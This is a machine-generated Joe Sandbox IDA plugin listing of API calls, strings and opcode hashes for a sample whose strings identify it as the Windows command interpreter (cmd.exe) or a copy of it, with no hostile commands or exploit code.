                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction ID: 1cdace2bd3fe6f00d5ef111cbce25f000504adc8c12956f338fceb3a4db3fe2b
                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction Fuzzy Hash: 359172BBB09A8785EE64AB50D8502B8A3A5FF49F98FC84135C94E47695DF3CE905C320

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID: CMD.EXE
                                      • API String ID: 1606018815-3025314500
                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction ID: 8baecc15e49cd004b83f18b21d64bf2d2e5a56cc4aa177d0c769905f067ba7ba
                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction Fuzzy Hash: ED41F3BAA09683CBE7456B15E845178FBA1FF89F59FCC4139C90E87360DF3CA4148660

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ConsoleTitlewcschr
                                      • String ID: /$:
                                      • API String ID: 2364928044-4222935259
                                      • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                      • Instruction ID: 2533290812a217f91998278a9da034bce6f7e06ef9d7a21e0825d9dddc855f55
                                      • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                      • Instruction Fuzzy Hash: 94C19EEBE0864381EA64BB25D4142B9A6A0FF81F98FCC5531E91E472D5EF3CE845D320

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                      • String ID:
                                      • API String ID: 4291973834-0
                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction ID: 2335df1199ad318f74c5eae0fc773c3075df21977897c4360f65a0b77039ad75
                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction Fuzzy Hash: 3D41B9EFE0868386E691FB10E940279A2A0AF44F6CFC80436D94D876A1DF7DEC448660

                                      Control-flow Graph

                                      APIs
                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                      • memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      Similarity
                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                      • String ID:
                                      • API String ID: 1623332820-0
                                      • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                      • Instruction ID: ee96a19b9fa0f1cc9fffb79ea2662411ed397d94518712410385f165bd0d9323
                                      • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                      • Instruction Fuzzy Hash: B81194ABA18B8382DE50AB41A404039FBA1EB89F94BCD9035DE4E03744DE3DE8418760

                                      Control-flow Graph

                                      APIs
                                      Similarity
                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                      • String ID:
                                      • API String ID: 1826527819-0
                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction ID: 571ab0044a63b28afc6e93d8ac93c660179a7cfbd2b90d0ef0b0643428252375
                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction Fuzzy Hash: 7F015BBA9086838AE6407B24A4451B9FF60EB8EF69FC86130D54F46395CF3C94448B20
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF755CA92AC), ref: 00007FF755CB30CA
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB30DD
                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB30F6
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB3106
                                      Similarity
                                      • API ID: ErrorMode$FullNamePathwcschr
                                      • String ID:
                                      • API String ID: 1464828906-0
                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction ID: aadf6ab21e20f87c1b43e20b080568f2d70318039600faa5db4c2cf0229446d1
                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction Fuzzy Hash: C531D3ABE0865382E764AF15A44007EF661EB46FA8FDC9234DA5A433D0EE7DEC458310
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: memset
                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                      • API String ID: 2221118986-3416068913
                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction ID: 9480f50401eb63d477c8859848da6b64336bdd9db7cef6448b0f6c72183955dc
                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction Fuzzy Hash: 3411CAABA1864781EB90EB55E144279A6909F84FA8F9C4731ED6D4B7D5DD2CD8804320
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: memsetwcschr
                                      • String ID: 2$COMSPEC
                                      • API String ID: 1764819092-1738800741
                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction ID: 662b3d5409abe09da91de2967998a9e08c64981624db127003399d2cf7f84a53
                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction Fuzzy Hash: 51519EBFA0864785FB70BB21D841379EB919F45F8CF8C4835DA0D466D6DE6CE8408760
                                      APIs
                                      Similarity
                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                      • String ID:
                                      • API String ID: 4254246844-0
                                      • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                      • Instruction ID: 079cbb35de01beabb00a3983ac20bd906b55bab50d1797c23c58b4b7e1a6c5e7
                                      • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                      • Instruction Fuzzy Hash: 9E41B4ABA0874386EE20AB50E444379F7A0EF85FA8FDC4535DA4E47791DE3CE8458621
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                      • String ID:
                                      • API String ID: 2643372051-0
                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction ID: 06eddbe180d11163b964c505e91ec28edcd14a2119231e091c34419f617a7a3f
                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction Fuzzy Hash: B1F062A7A19B8385EA40AB65A544075EAA1FF5AFA4BCE9274C52E43390DE3C94848250
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandle$ConsoleMode
                                      • String ID:
                                      • API String ID: 1591002910-0
                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction ID: 67575a527bb5efb5466e517999647032b9c05da1353cf30e2682f441c974d32b
                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction Fuzzy Hash: A9F07ABAA09783CBE645AB11E845078FBA1FB89F19F984138C90E47320DF3CA4159B50
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DriveType
                                      • String ID: :
                                      • API String ID: 338552980-336475711
                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction ID: 2d0016b0763a197c1f25ec152b19339566973f95dd34a8cf6da0d82f619cd5d3
                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction Fuzzy Hash: 1EE06DAB618641C6E720AB60E45106AF7A0FB8DB58FC81525EA8D83724DB3CD249CB18
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF755CB5B52
                                        • Part of subcall function 00007FF755CB4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4297
                                        • Part of subcall function 00007FF755CB4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB42D7
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB42FD
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB4368
                                        • Part of subcall function 00007FF755CB4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4380
                                        • Part of subcall function 00007FF755CB4224: wcsrchr.MSVCRT ref: 00007FF755CB43E6
                                        • Part of subcall function 00007FF755CB4224: lstrcmpW.KERNELBASE ref: 00007FF755CB4401
                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF755CB5BC7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                      • String ID:
                                      • API String ID: 497088868-0
                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction ID: 95d59afd5feec4c2b001340e9742b648a7e3289d150dc7d3ccd9095fd8b9787b
                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction Fuzzy Hash: EF31B5BAB0C64342FA24B711A45117DE291FF89F98FCC5435E94E87B85EE3CE8018720
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskmalloc
                                      • String ID:
                                      • API String ID: 1412018758-0
                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction ID: f090eb7926ce24c860bcb84f1e542b3b97e04b2420b2439611bfda745a8b02d0
                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction Fuzzy Hash: 65E092CBF5930791FE143B62684117892405F18F68FCC2430CD0E09782EE2CF8918330
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction ID: 44706e5a77077c0b5c8ddf152b709d7bc288a67bd0d79f9e1579c805c9462ec3
                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction Fuzzy Hash: EDF019BBE18A8386EA45AB15F84007CFBA1FB89F44BDD9438D90E43354DF7CA481C620
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: exit
                                      • String ID:
                                      • API String ID: 2483651598-0
                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction ID: 81f9d75822dda14730cadf88005f73625eb9b3c07ad1d6ce190c222bdd2c60bb
                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction Fuzzy Hash: 4DC0127670874747EB5C7731249103999555B09F15F885478C50681281DD6CDC048214
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DefaultUser
                                      • String ID:
                                      • API String ID: 3358694519-0
                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction ID: 97cec5db0f111e631af2bdd3643167faf7dbcda2662f1e2541dad4e1271ff61d
                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction Fuzzy Hash: 15E02BFBD082938BF5943B4164413B49953CB78FA7FCC4031C70E022C4ED2D2E456628
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction ID: 08bfc19c71f091ed5aee499db9d885408c3def87804c3ff2857b07183fdd1771
                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction Fuzzy Hash: 44F0BE66B09BC240EA409B57B940129A2909B88FF4B8C8330EB7D47BC9DE3CD8528300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                      • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                      • API String ID: 1388555566-2647954630
                                      • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                      • Instruction ID: dfc3dd9d6f4f2cad6d6c352a67d7b83d4b2bdb94e8252a9e93b1e1278fb3bfe7
                                      • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                      • Instruction Fuzzy Hash: F3A2A4BBA0878386EB50AB21E4541B9FBA1FB89F48F889535DA1E47794DF3CD444C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                      • String ID: &<|>$+: $:$:EOF$=,;$^
                                      • API String ID: 511550188-726566285
                                      • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                      • Instruction ID: a5486c28e2fc63e942fbb63dba972026fefcf770199ea842301f302a067ae63d
                                      • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                      • Instruction Fuzzy Hash: 1C52C2ABE0869386EB64AB24E414279FAA0FB46F58FCC4535D94E43794DF3CE841C760
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmp$wcschr$wcstol
                                      • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                      • API String ID: 1738779099-3004636944
                                      • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                      • Instruction ID: e0c0709302f5637f6a18682d07c3265e322e9f296710ee37984746956da49e76
                                      • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                      • Instruction Fuzzy Hash: 42727EBBE086438AEB50AB65D4042BDBBA1FB44F4CF888535DE0D57B94DE3CA855C360
                                      APIs
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F44
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC7F5C
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F9E
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7FFF
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8020
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8036
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8061
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8075
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC80D6
